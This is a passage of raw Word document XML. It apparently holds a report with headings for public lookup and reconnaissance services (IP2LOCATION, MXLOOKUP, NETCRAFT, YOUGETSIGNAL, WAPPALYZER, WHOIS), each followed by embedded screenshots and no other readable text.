          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IP2LOCATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1C562B" w14:textId="5EB88C0E" w:rsidR="002625AC" w:rsidRDefault="002625AC" w:rsidP="00DF4764">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37604F61" wp14:editId="05B7F4BC">
            <wp:extent cx="5437632" cy="2914594"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="33" name="Picture 3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978" cy="2916387"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1006B269" w14:textId="77777777" w:rsidR="002625AC" w:rsidRDefault="002625AC" w:rsidP="00DF4764">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69AE5337" w14:textId="0E69E86F" w:rsidR="002625AC" w:rsidRPr="001C411D" w:rsidRDefault="002625AC" w:rsidP="00DF4764">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MXLOOKUP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFA67B4" w14:textId="2BC09DF4" w:rsidR="00DF4764" w:rsidRPr="001C411D" w:rsidRDefault="002625AC" w:rsidP="00DF4764">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DBD2403" wp14:editId="4447B7FB">
            <wp:extent cx="5510784" cy="2953804"/>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1817" cy="2959718"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6957C7" w14:textId="77777777" w:rsidR="00DF4764" w:rsidRPr="001C411D" w:rsidRDefault="00DF4764" w:rsidP="00DF4764">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E3804EB" w14:textId="0887A05E" w:rsidR="00DF4764" w:rsidRPr="001C411D" w:rsidRDefault="002625AC" w:rsidP="00DF4764">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002625AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NETCRAFT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16215FE6" w14:textId="5D462774" w:rsidR="00DF4764" w:rsidRDefault="002625AC"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0D84FD01" wp14:editId="4265FA75">
            <wp:extent cx="5934710" cy="31826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2BA45019" w14:textId="72BD2A02" w:rsidR="002625AC" w:rsidRDefault="002625AC" w:rsidP="00DF4764">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="591DA353" wp14:editId="7144F7A3">
            <wp:extent cx="5943600" cy="318643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5E018590" w14:textId="77777777" w:rsidR="002625AC" w:rsidRDefault="002625AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FFA72D" w14:textId="3D455AFB" w:rsidR="002625AC" w:rsidRPr="001C411D"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6EF0F806" wp14:editId="25AB08BA">
            <wp:extent cx="5934710" cy="318262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24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="455B5272" wp14:editId="5A139B9A">
            <wp:extent cx="5934710" cy="318262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1968BAB2" w14:textId="77777777" w:rsidR="00DF4764" w:rsidRPr="001C411D" w:rsidRDefault="00DF4764" w:rsidP="00DF4764">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61CF04B8" w14:textId="77777777" w:rsidR="00DF4764" w:rsidRPr="001C411D" w:rsidRDefault="00DF4764" w:rsidP="00DF4764">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DF500AD" w14:textId="77777777" w:rsidR="00DF4764" w:rsidRPr="001C411D" w:rsidRDefault="00DF4764" w:rsidP="00DF4764">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B27D407" w14:textId="77777777" w:rsidR="00DF4764" w:rsidRPr="001C411D" w:rsidRDefault="00DF4764" w:rsidP="00DF4764">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61FDC896" w14:textId="77777777" w:rsidR="00DF4764" w:rsidRPr="001C411D" w:rsidRDefault="00DF4764" w:rsidP="00DF4764">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60051D99" w14:textId="77777777" w:rsidR="002350C6" w:rsidRPr="001C411D" w:rsidRDefault="002350C6" w:rsidP="00DF4764">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F4D6121" w14:textId="77255628" w:rsidR="002350C6" w:rsidRDefault="002625AC"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2848CD04" wp14:editId="1CC2C5A7">
            <wp:extent cx="5934710" cy="318262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7C20827B" w14:textId="07C0D831" w:rsidR="002625AC" w:rsidRDefault="002625AC" w:rsidP="00DF4764">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65FEBB0F" wp14:editId="5BEFF5A7">
            <wp:extent cx="5943600" cy="318643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3C4808EC" w14:textId="328B1010" w:rsidR="002625AC" w:rsidRDefault="002625AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF416D9" w14:textId="12879B21" w:rsidR="002625AC" w:rsidRPr="001C411D"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1194EA56" wp14:editId="291248D9">
            <wp:extent cx="5934710" cy="318262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24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53810635" wp14:editId="18586782">
            <wp:extent cx="5934710" cy="318262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16941412" w14:textId="7756FD9A" w:rsidR="002625AC" w:rsidRDefault="002625AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4BFB1F" w14:textId="0CA1320F" w:rsidR="002625AC"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1501993A" wp14:editId="6B386021">
            <wp:extent cx="5934710" cy="318262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24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="270A6628" wp14:editId="7B5C9A40">
            <wp:extent cx="5934710" cy="3182620"/>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1F0A33DB" w14:textId="77777777" w:rsidR="002625AC" w:rsidRDefault="002625AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4A8A1B" w14:textId="2C821C19" w:rsidR="002350C6"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419AB619" wp14:editId="00E356B5">
            <wp:extent cx="5934710" cy="318262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4693A8D8" w14:textId="032FDE89" w:rsidR="002625AC" w:rsidRDefault="002625AC"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1182D591" wp14:editId="2EB8D0D2">
            <wp:extent cx="5934710" cy="318262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5ECA9B08" w14:textId="1DAA7B84" w:rsidR="002625AC" w:rsidRDefault="002625AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3051493A" w14:textId="1B28FB45" w:rsidR="002625AC"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33A3F929" wp14:editId="7BF4018D">
            <wp:extent cx="5934710" cy="318262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55E58BF9" w14:textId="77777777" w:rsidR="002625AC" w:rsidRDefault="002625AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C13B548" w14:textId="77777777" w:rsidR="002625AC" w:rsidRDefault="002625AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002625AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>YOUGETSIGNAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3C4F80" w14:textId="2F899B94" w:rsidR="002625AC" w:rsidRDefault="002625AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="711BF745" wp14:editId="1D646529">
            <wp:extent cx="5934710" cy="318262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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="53706D96" w14:textId="17DA226D" w:rsidR="002625AC"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53EF1CEC" wp14:editId="06DDB630">
            <wp:extent cx="5934710" cy="318262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24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10475EBC" wp14:editId="7FAA43E5">
            <wp:extent cx="5934710" cy="318262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266771B0" w14:textId="77777777" w:rsidR="002625AC" w:rsidRDefault="002625AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E23363" w14:textId="6ABA8F6C" w:rsidR="002625AC"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53FCE32A" wp14:editId="154748A5">
            <wp:extent cx="5934710" cy="318262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574A57D9" w14:textId="77777777" w:rsidR="002625AC" w:rsidRDefault="002625AC" w:rsidP="00DF4764">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E77C5A1" w14:textId="4B97F48C" w:rsidR="002625AC" w:rsidRDefault="002625AC" w:rsidP="00DF4764">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002625AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>WAPPALYZER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A0915C" w14:textId="0EEA6F70" w:rsidR="002625AC" w:rsidRDefault="002625AC" w:rsidP="00DF4764">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CB95729" wp14:editId="1D1A5D46">
            <wp:extent cx="5943600" cy="3186430"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="153" name="Picture 1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12F46A57" w14:textId="2B6ED0C4" w:rsidR="002625AC" w:rsidRDefault="002625AC"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1D5B4370" wp14:editId="78B3F945">
            <wp:extent cx="5934710" cy="318262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16C78E94" w14:textId="26665229" w:rsidR="002625AC" w:rsidRDefault="002625AC" w:rsidP="00DF4764">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48626ADF" wp14:editId="06F230F0">
            <wp:extent cx="5943600" cy="3186430"/>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3E6ABB06" w14:textId="77777777" w:rsidR="002625AC" w:rsidRDefault="002625AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="45714B66" w14:textId="67BDF8FF" w:rsidR="002625AC" w:rsidRDefault="002625AC" w:rsidP="00DF4764">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64CBDFA7" wp14:editId="45C1E333">
            <wp:extent cx="5943600" cy="3186430"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="155" name="Picture 1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41F095E2" w14:textId="09D41488" w:rsidR="002625AC" w:rsidRDefault="002625AC" w:rsidP="00DF4764">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="750CBFA0" wp14:editId="6A3DD8FF">
            <wp:extent cx="5943600" cy="3186430"/>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4F87DA29" w14:textId="29C92CFD" w:rsidR="002625AC" w:rsidRDefault="002625AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CFB470" w14:textId="7A7C0AFE" w:rsidR="002625AC" w:rsidRDefault="002625AC" w:rsidP="00DF4764">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E6B6AAD" wp14:editId="0BCA0893">
            <wp:extent cx="5943600" cy="3186430"/>
            <wp:effectExtent l="0" t="0" r="0" b="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1F6761E9" w14:textId="77777777" w:rsidR="00093C15" w:rsidRDefault="00093C15" w:rsidP="00DF4764">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69268893" w14:textId="7BDE0155" w:rsidR="00093C15" w:rsidRDefault="00093C15" w:rsidP="00DF4764">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>WHOIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E12C0C7" w14:textId="3860D583" w:rsidR="00093C15" w:rsidRDefault="00093C15"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28F165D0" wp14:editId="4BEDA204">
            <wp:extent cx="5934710" cy="318262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75EBDAED" w14:textId="77777777" w:rsidR="00093C15" w:rsidRDefault="00093C15">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="41641AB1" w14:textId="7EDDEE29" w:rsidR="00093C15" w:rsidRPr="001C411D" w:rsidRDefault="00093C15"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385266C7" wp14:editId="0AC6920F">
            <wp:extent cx="5934710" cy="31826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49D2AB4A" w14:textId="6B08E9C6" w:rsidR="00093C15" w:rsidRDefault="00093C15"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24F3D563" wp14:editId="225666A2">
            <wp:extent cx="5934710" cy="318262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4FFD41FF" w14:textId="77777777" w:rsidR="00093C15" w:rsidRDefault="00093C15">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B0E9DF" w14:textId="5D0DA22E" w:rsidR="002350C6" w:rsidRPr="001C411D" w:rsidRDefault="00093C15" w:rsidP="00DF4764">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="076A9920" wp14:editId="4F146904">
            <wp:extent cx="5934710" cy="318262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32020AED" w14:textId="5BFC8ADE" w:rsidR="00DF4764" w:rsidRPr="001C411D" w:rsidRDefault="00093C15" w:rsidP="00DF4764">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3285BD82" wp14:editId="79D78454">
            <wp:extent cx="5934710" cy="318262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136A0629" w14:textId="77777777" w:rsidR="00DF4764" w:rsidRPr="001C411D" w:rsidRDefault="00DF4764" w:rsidP="00DF4764">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="657B0120" w14:textId="77777777" w:rsidR="00DF4764" w:rsidRPr="001C411D" w:rsidRDefault="00DF4764" w:rsidP="00DF4764">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
